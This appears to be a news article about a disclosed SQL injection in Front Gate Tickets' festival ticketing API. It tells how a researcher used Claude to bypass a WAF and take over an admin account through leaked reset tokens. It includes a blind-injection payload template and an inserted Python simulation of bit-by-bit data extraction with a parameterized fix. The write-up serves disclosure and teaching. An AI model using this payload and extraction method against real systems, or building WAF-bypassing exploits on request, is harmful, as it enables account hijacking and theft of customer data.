Hacker Exploits Claude AI to Gain Free Access to Major US Music Festivals

A significant security flaw in Front Gate Tickets (FGT), a subsidiary of Live Nation/Ticketmaster responsible for ticketing major U.S. music festivals such as EDC, Bonnaroo, and Outside Lands, was exploited by a researcher using Anthropic’s Claude AI model. This vulnerability allowed unauthorized administrative access to the platform, enabling the issuance of free tickets and access to sensitive customer data.

The researcher, Ian Carroll, observed that numerous prominent U.S. festivals used the same FGT domains for ticketing. While fuzzing the `fgtapi.frontgatetickets.com` API with ffuf, Carroll found that any endpoint path containing the term "device" returned an error demanding a `deviceUID` parameter. This pointed to unauthenticated middleware serving the on-site scanner and box-office hardware.

Further investigation showed that a `deviceUID` value of `12345` returned a normal response, but appending a single quote caused the request to hang. This behavior suggested that the parameter was concatenated directly into a raw SQL query without escaping or parameterization, exposing the endpoint to SQL injection.

Bypassing the Web Application Firewall with Claude AI

Despite the presence of an AWS Web Application Firewall (WAF), traditional tools like sqlmap were ineffective in exploiting the vulnerability. Carroll then employed Claude Code, running the Opus model, to analyze the issue. Claude determined that the WAF only inspected the outer layer of input, allowing injection payloads nested within a derived subquery to bypass detection.

Since the endpoint did not return query output directly, Claude devised a boolean-based blind SQL injection built on MySQL's implicit type conversion: a non-numeric string such as `'x'` evaluates to 0 in arithmetic, so `'x'+(subquery)` takes the value of the subquery. With a payload of the form `deviceUID = x'+(SELECT CASE WHEN <condition> THEN 1 ELSE 0 END)-- -` (the `-- -` comments out the closing quote of the original query), the lookup compares against 1 when the condition holds and 0 when it does not, and the response alternated between two device names, "MC70-023" for true and "Intellitix Upload" for false. That single bit of difference is a reliable oracle for extracting data bit by bit.
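The chain above (a parameter concatenated into raw SQL, the quote probe, the `'x'+(CASE ...)` trick and bit-by-bit extraction through the two device names) can be reproduced offline. The following is an added example written for this page, not code from the article or from Front Gate Tickets: a sqlite3 in-memory database stands in for the MySQL backend, the `device` and `reset_token` tables, their columns and the secret `Q7hF` are constructed, and nothing here models the AWS WAF. SQLite applies the same string-to-zero coercion in arithmetic that the payload relies on in MySQL; its `unicode()`/`substr()` play the role of MySQL's `ORD()`/`SUBSTRING()`. The parameterized lookup at the end is the fix the article implies, shown beside the vulnerable form.

```python
"""Boolean-based blind SQL injection, simulated end to end.

Added example, not code from the original article or from Front Gate Tickets.
sqlite3 stands in for the MySQL backend; table names, column names and the
secret token are constructed. The article's WAF is not simulated.
"""
import sqlite3

TRUE_DEVICE = "MC70-023"            # name returned when the injected condition held
FALSE_DEVICE = "Intellitix Upload"  # name returned when it did not


def build_db() -> sqlite3.Connection:
    """Constructed schema: the rows with UID 1 and 0 are what the CASE selects."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE device (deviceUID INTEGER, name TEXT);
        INSERT INTO device VALUES (0, 'Intellitix Upload');
        INSERT INTO device VALUES (1, 'MC70-023');
        INSERT INTO device VALUES (12345, 'Box Office 1');
        CREATE TABLE reset_token (token TEXT);
        INSERT INTO reset_token VALUES ('Q7hF');   -- constructed secret
    """)
    return con


def lookup_device_vulnerable(con, device_uid: str):
    """The defect the article describes: deviceUID concatenated into raw SQL."""
    sql = f"SELECT name FROM device WHERE deviceUID = '{device_uid}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def lookup_device_fixed(con, device_uid: str):
    """Parameterized form: the driver binds the value, so it is never parsed as SQL."""
    row = con.execute(
        "SELECT name FROM device WHERE deviceUID = ?", (device_uid,)
    ).fetchone()
    return row[0] if row else None


def quote_breaks_query(con) -> bool:
    """The article's first signal: 12345 works, 12345' breaks the statement.
    The real endpoint hung; sqlite raises a syntax error instead."""
    try:
        lookup_device_vulnerable(con, "12345'")
        return False
    except sqlite3.OperationalError:
        return True


class BlindOracle:
    """Turns the two device names into a one-bit oracle and extracts data with it."""

    def __init__(self, con):
        self.con = con
        self.requests = 0   # every bit costs one HTTP request in the real attack

    def ask(self, condition: str) -> bool:
        # 'x' coerces to 0 in arithmetic, so 'x'+(subquery) equals the CASE result:
        # deviceUID = 1 when the condition holds, deviceUID = 0 when it does not.
        # The trailing -- - comments out the closing quote of the original query.
        self.requests += 1
        payload = f"x'+(SELECT CASE WHEN {condition} THEN 1 ELSE 0 END)-- -"
        return lookup_device_vulnerable(self.con, payload) == TRUE_DEVICE

    def extract_int(self, int_expr: str, bits: int) -> int:
        """Recover an integer-valued SQL expression one bit per request."""
        value = 0
        for bit in range(bits - 1, -1, -1):
            if self.ask(f"((({int_expr}) >> {bit}) & 1) = 1"):
                value |= 1 << bit
        return value

    def extract_string(self, scalar_subquery: str, len_bits: int = 8) -> str:
        """Recover a string: its length first, then each ASCII character (7 bits)."""
        length = self.extract_int(f"length(({scalar_subquery}))", len_bits)
        return "".join(
            chr(self.extract_int(f"unicode(substr(({scalar_subquery}), {i}, 1))", 7))
            for i in range(1, length + 1)
        )


if __name__ == "__main__":
    con = build_db()
    print("normal lookup:", lookup_device_vulnerable(con, "12345"))
    print("quote breaks query:", quote_breaks_query(con))
    oracle = BlindOracle(con)
    print("1=1 ->", oracle.ask("1=1"), "| 1=2 ->", oracle.ask("1=2"))
    token = oracle.extract_string("SELECT token FROM reset_token LIMIT 1")
    print(f"recovered token {token!r} in {oracle.requests} requests")
    print("fixed endpoint given the payload:",
          lookup_device_fixed(con, "x'+(SELECT 1)-- -"))
```

Recovering the four-character constructed token costs 36 requests (8 for the length, 7 per character); a real token or password hash is recovered the same way, just with more round trips, which is why the article's single unauthenticated GET is enough to reach everything in the `fgs` database. Note that the bound parameter in `lookup_device_fixed` never matches anything when given the payload, because the driver compares it as an opaque value rather than parsing it.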

The compromised `fgs` database contained over 500 tables, including staff credentials, customer records, and live authentication tokens. Sensitive fields exposed included:

  • FGS_USER: Email, passcode, permissions JSON
  • PERSON: Email, passcode, reset token
  • RESET_TOKEN / API_TOKEN: Live, redeemable session and OAuth tokens

By accessing a live entry from the RESET_TOKEN table after initiating a password reset, Carroll was able to hijack an administrator account without knowing its password. This granted full write access to every festival on the platform, including inventory, pricing, and checkout systems.

With administrative privileges, an attacker could issue unlimited free “comp” tickets to any festival, search customer order databases (a test search for “chris” returned thousands of records), and read or redeem password reset tokens to hijack staff and customer accounts across the platform.

Carroll refrained from exfiltrating bulk data, stating that achieving administrative control over events like EDC and Bonnaroo from a single unauthenticated GET request sufficiently demonstrated the vulnerability.

Notably, Front Gate Tickets and Live Nation lacked a publicly listed security contact, compelling Carroll to guess a valid disclosure email. The vendor reportedly addressed the flaw promptly and indicated plans to establish a bug bounty program.

This incident highlights the evolving landscape of AI-assisted vulnerability research, where advanced language models like Claude can autonomously reverse-engineer WAF logic and construct complex blind injection exploits with minimal human input. As AI tools become more sophisticated, both attackers and defenders must adapt to the new challenges and opportunities they present in cybersecurity.